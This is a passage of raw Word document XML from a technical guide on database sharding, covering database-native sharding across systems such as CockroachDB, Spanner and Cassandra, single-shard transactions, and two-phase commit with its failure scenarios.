      </w:r>
    </w:p>
    <w:p w14:paraId="29423D44" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Proxy is a single point of failure (must be clustered/HA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D35132C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Limited SQL support (some queries can't be automatically routed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D650A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1566"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Proxy may become a throughput bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089F364" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Database-Native Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B3D75" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C81B4B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE3954" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│    Application      │  ← Connects to any node in the cluster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA207C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED0E24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A442D6E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FB133" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DBC01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│         Distributed Database Cluster         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43726155" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  ┌────────┐  ┌────────┐  ┌────────┐        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CD418" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │ Node 1 │  │ Node 2 │  │ Node 3 │  ...   │  ← Nodes coordinate internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05316ADF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  │Shard A │  │Shard B │  │Shard C │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDB1CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  └────────┘  └────────┘  └────────┘        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFAAF34" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2064C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The database itself handles sharding internally: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90"/>
        <w:gridCol w:w="6151"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="69A493F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C664E2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Database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18F610" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sharding Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="1CBF5DB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CE1205" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>CockroachDB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96441A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Automatic range-based splits, Raft consensus per range</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="334C49B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7AAE6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>TiDB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82D5AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Automatic range-based (TiKV storage layer, Raft groups)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2511BE1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B461E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>YugabyteDB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1C706B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Automatic hash or range, Raft per tablet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="104B825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B6770F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Spanner (Google)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025A35" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Automatic range-based, Paxos consensus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="43075B4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D40A57" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Cassandra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9D7110" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Consistent hashing, configurable per keyspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5DFA4A6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44FB20" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>MongoDB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62AFAC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Hash or range, configurable per collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4D6292A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0520FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>DynamoDB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CF865D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Automatic hash-based partitioning on partition key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59A1B81C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20EC08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1567"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Simplest for application (database handles everything internally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060BAAED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1567"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Online resharding is automatic (split/merge ranges as data grows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A90C89" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1567"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-shard queries handled by the database (distributed SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58528D5B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1567"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Distributed transactions supported natively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7205AEA0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0936C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Less control over placement (database decides).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F870D23" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Performance characteristics of distributed queries may surprise you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0FF54B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Vendor lock-in (database-specific).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E422892" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1568"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Operational complexity of the distributed database itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1B394A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="7F42D829">
          <v:rect id="_x0000_i5764" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7193F7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Sharding and Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06463A88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Single-Shard Transactions (Easy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40380A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB2C028" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>All data for the transaction is on ONE shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82A747" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18584C9A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance - 100 WHERE user_id = 42;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F6286" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  INSERT INTO transactions(user_id, amount) VALUES (42, -100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F37975" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628761FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7EC6CA46" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If user_id is the shard key: both statements hit the same shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4AD571" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Normal ACID transaction. No distributed coordination needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB2D2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>→ Same performance as a non-sharded database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09315BD0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Design principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Structure your shard key so that entities that transact together are on the same shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459BF83A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Distributed Transactions (Hard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EB5B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Two-Phase Commit (2PC) — detailed mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE15DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF94D5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Coordinator                    Shard 1                    Shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A150B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │                            │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6379E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │──── PREPARE ──────────────&gt;│                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB05C2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     │──── PREPARE ─────────────────────────────────────────&gt;│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCCF188" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │                            │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205AB750" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │&lt;─── VOTE YES ─────────────│                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533747C9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │&lt;─── VOTE YES ──────────────────────────────────────── │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC9CE0D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │                            │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF28F01" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │ (All voted YES)           │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466501BD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │                            │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C008A8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │──── COMMIT ───────────────&gt;│                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0035D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │──── COMMIT ──────────────────────────────────────────&gt;│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DCCD7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │                            │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20484DF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │&lt;─── ACK ──────────────────│                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2D75E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │&lt;─── ACK ───────────────────────────────────────────── │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696CE931" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │                            │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123AF7E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     │ Transaction complete       │                          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4569D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure scenarios: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510"/>
        <w:gridCol w:w="3362"/>
        <w:gridCol w:w="3478"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7A8F8F2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F9CF18" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Failure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8AA6E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Consequence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31EE4B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="453199A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74D30A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Coordinator fails before PREPARE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D1263C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Nothing happened. Timeout → abort.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B4B287" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Coordinator restarts, retries or aborts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="40BBF4D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E0160D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Participant fails before VOTE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BAB2A9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Coordinator doesn't get vote → timeout → ABORT all.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64D13E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Participant recovers, sees no commit record → rolls back.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="599A5F0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ABBFBC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Coordinator fails after PREPARE, before COMMIT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E73F8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>BLOCKING: participants hold locks, waiting for COMMIT or ABORT decision.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7DDD2A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Coordinator recovers from its log, sends decision. Or: participants elect new coordinator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
